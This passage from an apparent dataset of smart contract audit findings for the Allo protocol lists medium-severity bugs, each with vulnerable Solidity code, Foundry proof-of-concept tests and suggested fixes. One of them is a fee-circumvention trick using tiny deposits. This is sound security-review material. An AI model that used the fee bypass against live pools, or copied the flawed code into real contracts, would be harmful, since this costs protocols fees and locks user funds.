the pool state or be used with malicious intentions.\\nTwo managers accidentally set the same milestones. Milestones are duplicated and can't be reset, the pool needs to be recreated.\\nThe manager, in cahoots with the recipient, sets milestones one by one, thereby bypassing `totalAmountPercentage` check and increasing the payout amount.",```\\nif (upcomingMilestone != 0) revert MILESTONES_ALREADY_SET();\\n```\\n +Allo#_fundPool,medium,"Let's see the code of the `_fundPool` function:\\n```\\nfunction _fundPool(uint256 _amount, uint256 _poolId, IStrategy _strategy) internal {\\n uint256 feeAmount;\\n uint256 amountAfterFee = _amount;\\n\\n Pool storage pool = pools[_poolId];\\n address _token = pool.token;\\n\\n if (percentFee > 0) {\\n feeAmount = (_amount * percentFee) / getFeeDenominator();\\n amountAfterFee -= feeAmount;\\n\\n _transferAmountFrom(_token, TransferData({from: msg.sender, to: treasury, amount: feeAmount}));\\n }\\n\\n _transferAmountFrom(_token, TransferData({from: msg.sender, to: address(_strategy), amount: amountAfterFee}));\\n _strategy.increasePoolAmount(amountAfterFee);\\n\\n emit PoolFunded(_poolId, amountAfterFee, feeAmount);\\n }\\n```\\n\\nThe `feeAmount` is calculated as follows:\\n```\\nfeeAmount = (_amount * percentFee) / getFeeDenominator();\\n```\\n\\nwhere `getFeeDenominator` returns `1e18` and `percentFee` is represented like that: `1e18` = 100%, 1e17 = 10%, 1e16 = 1%, 1e15 = 0.1% (from the comments when declaring the variable).\\nLet's say the pool uses a token like GeminiUSD which is a token with 300M+ market cap, so it's widely used, and `percentFee` == 1e15 (0.1%)\\nA user could circumvent the fee by depositing a relatively small amount. In our example, he can deposit 9 GeminiUSD. In that case, the calculation will be: `feeAmount = (_amount * percentFee) / getFeeDenominator() = (9e2 * 1e15) / 1e18 = 9e17/1e18 = 9/10 = 0;`\\nSo the user ends up paying no fee. 
There is nothing stopping the user from funding his pool by invoking the `fundPool` with such a small amount as many times as he needs to fund the pool with whatever amount he chooses, circumventing the fee.\\nEspecially with the low gas fees on L2s on which the protocol will be deployed, this will be a viable method to fund a pool without paying any fee to the protocol.",Add a `minFundAmount` variable and check for it when funding a pool.,The protocol doesn't collect fees from pools with low decimal tokens.,"```\\nfunction _fundPool(uint256 _amount, uint256 _poolId, IStrategy _strategy) internal {\\n uint256 feeAmount;\\n uint256 amountAfterFee = _amount;\\n\\n Pool storage pool = pools[_poolId];\\n address _token = pool.token;\\n\\n if (percentFee > 0) {\\n feeAmount = (_amount * percentFee) / getFeeDenominator();\\n amountAfterFee -= feeAmount;\\n\\n _transferAmountFrom(_token, TransferData({from: msg.sender, to: treasury, amount: feeAmount}));\\n }\\n\\n _transferAmountFrom(_token, TransferData({from: msg.sender, to: address(_strategy), amount: amountAfterFee}));\\n _strategy.increasePoolAmount(amountAfterFee);\\n\\n emit PoolFunded(_poolId, amountAfterFee, feeAmount);\\n }\\n```\\n" +The `RFPSimpleStrategy._registerRecipient()` does not work when the strategy was created using the `useRegistryAnchor=true` causing that nobody can register to the pool,medium,"The `RFPSimpleStrategy` strategies can be created using the `useRegistryAnchor` which indicates whether to use the registry anchor or not. If the pool is created using the `useRegistryAnchor=true` the RFPSimpleStrategy._registerRecipient() will be reverted by RECIPIENT_ERROR. 
The problem is that when `useRegistryAnchor` is true, the variable recipientAddress is not collected so the function will revert by the RECIPIENT_ERROR.\\nI created a test where the strategy is created using the `userRegistryAnchor=true` then the `registerRecipient()` will be reverted by the `RECIPIENT_ERROR`.\\n```\\n// File: test/foundry/strategies/RFPSimpleStrategy.t.sol:RFPSimpleStrategyTest\\n// $ forge test --match-test ""test_registrationIsBlockedWhenThePoolIsCreatedWithUseRegistryIsTrue"" -vvv\\n//\\n function test_registrationIsBlockedWhenThePoolIsCreatedWithUseRegistryIsTrue() public {\\n // The registerRecipient() function does not work then the strategy was created using the\\n // useRegistryAnchor = true.\\n //\\n bool useRegistryAnchorTrue = true;\\n RFPSimpleStrategy custom_strategy = new RFPSimpleStrategy(address(allo()), ""RFPSimpleStrategy"");\\n\\n vm.prank(pool_admin());\\n poolId = allo().createPoolWithCustomStrategy(\\n poolProfile_id(),\\n address(custom_strategy),\\n abi.encode(maxBid, useRegistryAnchorTrue, metadataRequired),\\n NATIVE,\\n 0,\\n poolMetadata,\\n pool_managers()\\n );\\n //\\n // Create profile1 metadata and anchor\\n Metadata memory metadata = Metadata({protocol: 1, pointer: ""metadata""});\\n address anchor = profile1_anchor();\\n bytes memory data = abi.encode(anchor, 1e18, metadata);\\n //\\n // Profile1 member registers to the pool but it reverted by RECIPIENT_ERROR\\n vm.startPrank(address(profile1_member1()));\\n vm.expectRevert(abi.encodeWithSelector(RECIPIENT_ERROR.selector, address(anchor)));\\n allo().registerRecipient(poolId, data);\\n }\\n```\\n","When the strategy is using `useRegistryAncho=true`, get the `recipientAddress` from the data:\\n```\\n function _registerRecipient(bytes memory _data, address _sender)\\n internal\\n override\\n onlyActivePool\\n returns (address recipientId)\\n {\\n bool isUsingRegistryAnchor;\\n address recipientAddress;\\n address registryAnchor;\\n uint256 proposalBid;\\n Metadata 
memory metadata;\\n\\n // Decode '_data' depending on the 'useRegistryAnchor' flag\\n if (useRegistryAnchor) {\\n /// @custom:data when 'true' // Remove the line below\\n> (address recipientId, uint256 proposalBid, Metadata metadata)\\n// Remove the line below\\n// Remove the line below\\n (recipientId, proposalBid, metadata) = abi.decode(_data, (address, uint256, Metadata));\\n// Add the line below\\n// Add the line below\\n (recipientId, recipientAddress, proposalBid, metadata) = abi.decode(_data, (address, address, uint256, Metadata));\\n\\n // If the sender is not a profile member this will revert\\n if (!_isProfileMember(recipientId, _sender)) revert UNAUTHORIZED();\\n```\\n","The pool created with a strategy using the `userRegistryAnchor=true` can not get `registrants` because `_registerRecipient()` will be reverted all the time. If the pool is funded but no one can be allocated since there is not registered recipients, the deposited funds by others may be trapped because those are not distributed since there are not `registrants`.","```\\n// File: test/foundry/strategies/RFPSimpleStrategy.t.sol:RFPSimpleStrategyTest\\n// $ forge test --match-test ""test_registrationIsBlockedWhenThePoolIsCreatedWithUseRegistryIsTrue"" -vvv\\n//\\n function test_registrationIsBlockedWhenThePoolIsCreatedWithUseRegistryIsTrue() public {\\n // The registerRecipient() function does not work then the strategy was created using the\\n // useRegistryAnchor = true.\\n //\\n bool useRegistryAnchorTrue = true;\\n RFPSimpleStrategy custom_strategy = new RFPSimpleStrategy(address(allo()), ""RFPSimpleStrategy"");\\n\\n vm.prank(pool_admin());\\n poolId = allo().createPoolWithCustomStrategy(\\n poolProfile_id(),\\n address(custom_strategy),\\n abi.encode(maxBid, useRegistryAnchorTrue, metadataRequired),\\n NATIVE,\\n 0,\\n poolMetadata,\\n pool_managers()\\n );\\n //\\n // Create profile1 metadata and anchor\\n Metadata memory metadata = Metadata({protocol: 1, pointer: ""metadata""});\\n 
address anchor = profile1_anchor();\\n bytes memory data = abi.encode(anchor, 1e18, metadata);\\n //\\n // Profile1 member registers to the pool but it reverted by RECIPIENT_ERROR\\n vm.startPrank(address(profile1_member1()));\\n vm.expectRevert(abi.encodeWithSelector(RECIPIENT_ERROR.selector, address(anchor)));\\n allo().registerRecipient(poolId, data);\\n }\\n```\\n" +`_distribute()` function in RFPSimpleStrategy contract has wrong requirement causing DOS,medium,"The function _distribute():\\n```\\n function _distribute(address[] memory, bytes memory, address _sender)\\n internal\\n virtual\\n override\\n onlyInactivePool\\n onlyPoolManager(_sender)\\n {\\n // rest of code\\n\\n IAllo.Pool memory pool = allo.getPool(poolId);\\n Milestone storage milestone = milestones[upcomingMilestone];\\n Recipient memory recipient = _recipients[acceptedRecipientId];\\n\\n if (recipient.proposalBid > poolAmount) revert NOT_ENOUGH_FUNDS();\\n\\n uint256 amount = (recipient.proposalBid * milestone.amountPercentage) / 1e18;\\n\\n poolAmount -= amount;//<@@ NOTICE the poolAmount get decrease over time\\n\\n _transferAmount(pool.token, recipient.recipientAddress, amount);\\n\\n // rest of code\\n }\\n```\\n\\nLet's suppose this scenario:\\nPool manager funding the contract with 100 token, making `poolAmount` variable equal to 100\\nPool manager set 5 equal milestones with 20% each\\nSelected recipient's proposal bid is 100, making `recipients[acceptedRecipientId].proposalBid` variable equal to 100\\nAfter milestone 1 done, pool manager pays recipient using `distribute()`. 
Value of variables after: `poolAmount = 80 ,recipients[acceptedRecipientId].proposalBid = 100`\\nAfter milestone 2 done, pool manager will get DOS trying to pay recipient using `distribute()` because of this line:\\n```\\nif (recipient.proposalBid > poolAmount) revert NOT_ENOUGH_FUNDS();\\n```\\n",```\\n- if (recipient.proposalBid > poolAmount) revert NOT_ENOUGH_FUNDS();\\n+ if ((recipient.proposalBid * milestone.amountPercentage) / 1e18 > poolAmount) revert NOT_ENOUGH_FUNDS();\\n```\\n,This behaviour will cause DOS when distributing the 2nd milestone or higher,"```\\n function _distribute(address[] memory, bytes memory, address _sender)\\n internal\\n virtual\\n override\\n onlyInactivePool\\n onlyPoolManager(_sender)\\n {\\n // rest of code\\n\\n IAllo.Pool memory pool = allo.getPool(poolId);\\n Milestone storage milestone = milestones[upcomingMilestone];\\n Recipient memory recipient = _recipients[acceptedRecipientId];\\n\\n if (recipient.proposalBid > poolAmount) revert NOT_ENOUGH_FUNDS();\\n\\n uint256 amount = (recipient.proposalBid * milestone.amountPercentage) / 1e18;\\n\\n poolAmount -= amount;//<@@ NOTICE the poolAmount get decrease over time\\n\\n _transferAmount(pool.token, recipient.recipientAddress, amount);\\n\\n // rest of code\\n }\\n```\\n" +"`QVBaseStrategy::reviewRecipients()` doesn't check if the recipient is already accepted or rejected, and overwrites the current status",medium,"In the QV strategy contracts, recipients register themselves and wait for a pool manager to accept the registration. Pool managers can accept or reject recipients with the `reviewRecipients()` function. There is also a threshold (reviewThreshold) for recipients to be accepted. For example, if the `reviewThreshold` is 2, a pending recipient gets accepted when two managers accept this recipient and the `recipientStatus` is updated.\\nHowever, `QVBaseStrategy::reviewRecipients()` function doesn't check the recipient's current status. 
This one alone may not be an issue because managers may want to change the status of the recipient etc.\\nBut on top of that, the function also doesn't take the previous review counts into account when updating the status, and overwrites the status immediately after reaching the threshold. I'll share a scenario later about this below.\\n```\\nfile: QVBaseStrategy.sol\\n function reviewRecipients(address[] calldata _recipientIds, Status[] calldata _recipientStatuses)\\n external\\n virtual\\n onlyPoolManager(msg.sender)\\n onlyActiveRegistration\\n {\\n // make sure the arrays are the same length\\n uint256 recipientLength = _recipientIds.length;\\n if (recipientLength != _recipientStatuses.length) revert INVALID();\\n\\n for (uint256 i; i < recipientLength;) {\\n Status recipientStatus = _recipientStatuses[i];\\n address recipientId = _recipientIds[i];\\n\\n // if the status is none or appealed then revert\\n if (recipientStatus == Status.None || recipientStatus == Status.Appealed) { //@audit these are the input parameter statuse not the recipient's status.\\n revert RECIPIENT_ERROR(recipientId);\\n }\\n\\n reviewsByStatus[recipientId][recipientStatus]++;\\n\\n --> if (reviewsByStatus[recipientId][recipientStatus] >= reviewThreshold) { //@audit recipientStatus is updated right after the threshold is reached. It can overwrite if the status is already set.\\n Recipient storage recipient = recipients[recipientId];\\n recipient.recipientStatus = recipientStatus;\\n\\n emit RecipientStatusUpdated(recipientId, recipientStatus, address(0));\\n }\\n\\n emit Reviewed(recipientId, recipientStatus, msg.sender);\\n\\n unchecked {\\n ++i;\\n }\\n }\\n }\\n```\\n\\nAs I mentioned above, the function updates the `recipientStatus` immediately after reaching the threshold. 
Here is a scenario of why this might be an issue.\\nExample Scenario\\nThe pool has 5 managers and the `reviewThreshold` is 2.\\nThe first manager rejects the recipient\\nThe second manager accepts the recipient\\nThe third manager rejects the recipient. -> `recipientStatus` updated -> `status = REJECTED`\\nThe fourth manager rejects the recipient -> status still `REJECTED`\\nThe last manager accepts the recipient ->recipientStatus updated again -> `status = ACCEPTED`\\n3 managers rejected and 2 managers accepted the recipient but the recipient status is overwritten without checking the recipient's previous status and is ACCEPTED now.\\nCoded PoC\\nYou can prove the scenario above with the PoC. You can use the protocol's own setup for this.\\n- Copy the snippet below and paste it into the `QVBaseStrategy.t.sol` test file.\\n- Run forge test `--match-test test_reviewRecipient_reviewTreshold_OverwriteTheLastOne`\\n```\\n//@audit More managers rejected but the recipient is accepted\\n function test_reviewRecipient_reviewTreshold_OverwriteTheLastOne() public virtual {\\n address recipientId = __register_recipient();\\n\\n // Create rejection status\\n address[] memory recipientIds = new address[](1);\\n recipientIds[0] = recipientId;\\n IStrategy.Status[] memory Statuses = new IStrategy.Status[](1);\\n Statuses[0] = IStrategy.Status.Rejected;\\n\\n // Reject three times with different managers\\n vm.startPrank(pool_manager1());\\n qvStrategy().reviewRecipients(recipientIds, Statuses);\\n\\n vm.startPrank(pool_manager2());\\n qvStrategy().reviewRecipients(recipientIds, Statuses);\\n\\n vm.startPrank(pool_manager3());\\n qvStrategy().reviewRecipients(recipientIds, Statuses);\\n\\n // Three managers rejected. 
Status will be rejected.\\n assertEq(uint8(qvStrategy().getRecipientStatus(recipientId)), uint8(IStrategy.Status.Rejected));\\n assertEq(qvStrategy().reviewsByStatus(recipientId, IStrategy.Status.Rejected), 3);\\n\\n // Accept two times after three rejections\\n Statuses[0] = IStrategy.Status.Accepted;\\n vm.startPrank(pool_admin());\\n qvStrategy().reviewRecipients(recipientIds, Statuses);\\n\\n vm.startPrank(pool_manager4());\\n qvStrategy().reviewRecipients(recipientIds, Statuses);\\n\\n // 3 Rejected, 2 Accepted, but status is Accepted because it overwrites right after passing threshold.\\n assertEq(uint8(qvStrategy().getRecipientStatus(recipientId)), uint8(IStrategy.Status.Accepted));\\n assertEq(qvStrategy().reviewsByStatus(recipientId, IStrategy.Status.Rejected), 3);\\n assertEq(qvStrategy().reviewsByStatus(recipientId, IStrategy.Status.Accepted), 2);\\n }\\n```\\n\\nYou can find the test results below:\\n```\\nRunning 1 test for test/foundry/strategies/QVSimpleStrategy.t.sol:QVSimpleStrategyTest\\n[PASS] test_reviewRecipient_reviewTreshold_OverwriteTheLastOne() (gas: 249604)\\nTest result: ok. 
1 passed; 0 failed; 0 skipped; finished in 10.92ms\\n```\\n",Checking the review counts before updating the state might be helpful to mitigate this issue,Recipient status might be overwritten with less review counts.,"```\\nfile: QVBaseStrategy.sol\\n function reviewRecipients(address[] calldata _recipientIds, Status[] calldata _recipientStatuses)\\n external\\n virtual\\n onlyPoolManager(msg.sender)\\n onlyActiveRegistration\\n {\\n // make sure the arrays are the same length\\n uint256 recipientLength = _recipientIds.length;\\n if (recipientLength != _recipientStatuses.length) revert INVALID();\\n\\n for (uint256 i; i < recipientLength;) {\\n Status recipientStatus = _recipientStatuses[i];\\n address recipientId = _recipientIds[i];\\n\\n // if the status is none or appealed then revert\\n if (recipientStatus == Status.None || recipientStatus == Status.Appealed) { //@audit these are the input parameter statuse not the recipient's status.\\n revert RECIPIENT_ERROR(recipientId);\\n }\\n\\n reviewsByStatus[recipientId][recipientStatus]++;\\n\\n --> if (reviewsByStatus[recipientId][recipientStatus] >= reviewThreshold) { //@audit recipientStatus is updated right after the threshold is reached. 
It can overwrite if the status is already set.\\n Recipient storage recipient = recipients[recipientId];\\n recipient.recipientStatus = recipientStatus;\\n\\n emit RecipientStatusUpdated(recipientId, recipientStatus, address(0));\\n }\\n\\n emit Reviewed(recipientId, recipientStatus, msg.sender);\\n\\n unchecked {\\n ++i;\\n }\\n }\\n }\\n```\\n" +CREATE3 is not available in the zkSync Era.,medium,"The zkSync Era docs explain how it differs from Ethereum.\\nPOC:\\n```\\n// SPDX-License-Identifier: Unlicensed\\npragma solidity ^0.8.0;\\n\\nimport ""./MiniContract.sol"";\\nimport ""./CREATE3.sol"";\\n\\ncontract DeployTest {\\n address public deployedAddress;\\n event Deployed(address);\\n \\n function generateContract() public returns(address, address) {\\n bytes32 salt = keccak256(""SALT"");\\n\\n address preCalculatedAddress = CREATE3.getDeployed(salt);\\n\\n // check if the contract has already been deployed by checking code size of address\\n bytes memory creationCode = abi.encodePacked(type(MiniContract).creationCode, abi.encode(777));\\n\\n // Use CREATE3 to deploy the anchor contract\\n address deployed = CREATE3.deploy(salt, creationCode, 0);\\n return (preCalculatedAddress, deployed);\\n }\\n}\\n```\\n\\nAlso, the logic to compute the address of Create2 is different from Ethereum, as shown below, so the CREATE3 library cannot be used as it is.\\nThis cause registry returns an incorrect `preCalculatedAddress`, causing the anchor to be registered to an address that is not the actual deployed address.\\n```\\naddress ⇒ keccak256( \\n keccak256(""zksyncCreate2"") ⇒ 0x2020dba91b30cc0006188af794c2fb30dd8520db7e2c088b7fc7c103c00ca494, \\n sender, \\n salt, \\n keccak256(bytecode), \\n keccak256(constructorInput)\\n ) \\n```\\n","This can be solved by implementing CREATE2 directly instead of CREATE3 and using `type(Anchor).creationCode`. 
Also, the compute address logic needs to be modified for zkSync.","`generateAnchor` doesn't work, so users can't do anything related to the anchor.","```\\n// SPDX-License-Identifier: Unlicensed\\npragma solidity ^0.8.0;\\n\\nimport ""./MiniContract.sol"";\\nimport ""./CREATE3.sol"";\\n\\ncontract DeployTest {\\n address public deployedAddress;\\n event Deployed(address);\\n \\n function generateContract() public returns(address, address) {\\n bytes32 salt = keccak256(""SALT"");\\n\\n address preCalculatedAddress = CREATE3.getDeployed(salt);\\n\\n // check if the contract has already been deployed by checking code size of address\\n bytes memory creationCode = abi.encodePacked(type(MiniContract).creationCode, abi.encode(777));\\n\\n // Use CREATE3 to deploy the anchor contract\\n address deployed = CREATE3.deploy(salt, creationCode, 0);\\n return (preCalculatedAddress, deployed);\\n }\\n}\\n```\\n" +Anchor contract is unable to receive NFTs of any kind,medium,"Anchor.sol essentially works like a wallet, and is also attached to a profile to give it extra credibility and the profile owner more functionality.\\nAs intended this contract will receive nfts, from different strategies and protocols. However, as it is currently implemented these contracts will not be able to receive NFTs sent with safeTransferFrom(), because they do not implement the necessary functions to safely receive these tokens.\\nWhile in many cases such a situation would be Medium severity, looking at how these wallets will be used, this could lead to more serious consequences. 
For example, having an anchor that is entitled to high value NFTs but is not able to receive them is clearly a loss of funds risk, and a High severity issue.\\nimplement the onERC721Received() and onERC1155Received() functions in following code:\\n```\\n// SPDX-License-Identifier: AGPL-3.0-only\\npragma solidity 0.8.19;\\n\\n// Core Contracts\\nimport {Registry} from ""./Registry.sol"";\\n\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣾⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⣿⣿⣷⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣿⣿⣿⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⣿⣿⣿⣿⣿⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⣿⣿⣿⢿⣿⣿⣿⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⣿⣿⣿⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⣿⣿⣿⡟⠘⣿⣿⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⣀⣴⣾⣿⣿⣿⣿⣾⠻⣿⣿⣿⣿⣿⣿⣿⡆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⡿⠀⠀⠸⣿⣿⣿⣧⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⢀⣠⣴⣴⣶⣶⣶⣦⣦⣀⡀⠀⠀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⣴⣿⣿⣿⣿⣿⣿⡿⠃⠀⠙⣿⣿⣿⣿⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⣿⠁⠀⠀⠀⢻⣿⣿⣿⣧⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⣠⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣶⡀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⢀⣾⣿⣿⣿⣿⣿⣿⡿⠁⠀⠀⠀⠘⣿⣿⣿⣿⣿⡿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣾⣿⣿⣿⠃⠀⠀⠀⠀⠈⢿⣿⣿⣿⣆⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⣰⣿⣿⣿⡿⠋⠁⠀⠀⠈⠘⠹⣿⣿⣿⣿⣆⠀⠀⠀\\n// ⠀⠀⠀⠀⢀⣾⣿⣿⣿⣿⣿⣿⡿⠀⠀⠀⠀⠀⠀⠈⢿⣿⣿⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣾⣿⣿⣿⠏⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⡄⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⢰⣿⣿⣿⣿⠁⠀⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⡀⠀⠀\\n// ⠀⠀⠀⢠⣿⣿⣿⣿⣿⣿⣿⣟⠀⡀⢀⠀⡀⢀⠀⡀⢈⢿⡟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡄⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⡇⠀⠀\\n// ⠀⠀⣠⣿⣿⣿⣿⣿⣿⡿⠋⢻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣶⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⣿⣿⣿⡿⢿⠿⠿⠿⠿⠿⠿⠿⠿⠿⢿⣿⣿⣿⣷⡀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠸⣿⣿⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⣿⠂⠀⠀\\n// ⠀⠀⠙⠛⠿⠻⠻⠛⠉⠀⠀⠈⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⣿⣿⣿⣿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢿⣿⣿⣿⣧⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⢻⣿⣿⣿⣷⣀⢀⠀⠀⠀⡀⣰⣾⣿⣿⣿⠏⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠛⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⢰⣿⣿⣿⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⣧⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠹⢿⣿⣿⣿⣿⣾⣾⣷⣿⣿⣿⣿⡿⠋⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠙⠙⠋⠛⠙⠋⠛⠙⠋⠛⠙⠋⠃⠀⠀⠀⠀⠀⠀⠀⠀⠠⠿⠻⠟⠿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠸⠟⠿⠟⠿⠆⠀⠸⠿⠿⠟⠯⠀⠀⠀⠸⠿⠿⠿⠏⠀⠀⠀⠀⠀⠈⠉⠻⠻⡿⣿⢿⡿⡿⠿⠛⠁⠀⠀⠀⠀⠀⠀\\n// allo.gitcoin.co\\n\\n/// @title Anchor contract\\n/// @author @thelostone-mc , @0xKurt , @codenamejason , @0xZakk , @nfrgosselin \\n/// @notice Anchors are associated with profiles and are accessible exclusively by the 
profile owner. This contract ensures secure\\n/// and authorized interaction with external addresses, enhancing the capabilities of profiles and enabling controlled\\n/// execution of operations. The contract leverages the `Registry` contract for ownership verification and access control.\\ncontract Anchor {\\n /// ==========================\\n /// === Storage Variables ====\\n /// ==========================\\n\\n /// @notice The registry contract on any given network/chain\\n Registry public immutable registry;\\n\\n /// @notice The profileId of the allowed profile to execute calls\\n bytes32 public immutable profileId;\\n\\n /// ==========================\\n /// ======== Errors ==========\\n /// ==========================\\n\\n /// @notice Throws when the caller is not the owner of the profile\\n error UNAUTHORIZED();\\n\\n /// @notice Throws when the call to the target address fails\\n error CALL_FAILED();\\n\\n /// ==========================\\n /// ======= Constructor ======\\n /// ==========================\\n\\n /// @notice Constructor\\n /// @dev We create an instance of the 'Registry' contract using the 'msg.sender' and set the profileId.\\n /// @param _profileId The ID of the allowed profile to execute calls\\n constructor(bytes32 _profileId) {\\n registry = Registry(msg.sender);\\n profileId = _profileId;\\n }\\n\\n /// ==========================\\n /// ======== External ========\\n /// ==========================\\n\\n /// @notice Execute a call to a target address\\n /// @dev 'msg.sender' must be profile owner\\n /// @param _target The target address to call\\n /// @param _value The amount of native token to send\\n /// @param _data The data to send to the target address\\n /// @return Data returned from the target address\\n function execute(address _target, uint256 _value, bytes memory _data) external returns (bytes memory) {\\n // Check if the caller is the owner of the profile and revert if not\\n if (!registry.isOwnerOfProfile(profileId, 
msg.sender)) revert UNAUTHORIZED();\\n\\n // Check if the target address is the zero address and revert if it is\\n if (_target == address(0)) revert CALL_FAILED();\\n\\n // Call the target address and return the data\\n (bool success, bytes memory data) = _target.call{value: _value}(_data);\\n\\n // Check if the call was successful and revert if not\\n if (!success) revert CALL_FAILED();\\n\\n return data;\\n }\\n\\n /// @notice This contract should be able to receive native token\\n receive() external payable {}\\n}\\n```\\n",implement the onERC721Received() and onERC1155Received() functions,"Any time an ERC721 or ERC1155 is attempted to be transferred with safeTransferFrom() or minted with safeMint(), the call will fail.","```\\n// SPDX-License-Identifier: AGPL-3.0-only\\npragma solidity 0.8.19;\\n\\n// Core Contracts\\nimport {Registry} from ""./Registry.sol"";\\n\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣾⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⣿⣿⣷⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣿⣿⣿⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⣿⣿⣿⣿⣿⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\\n// 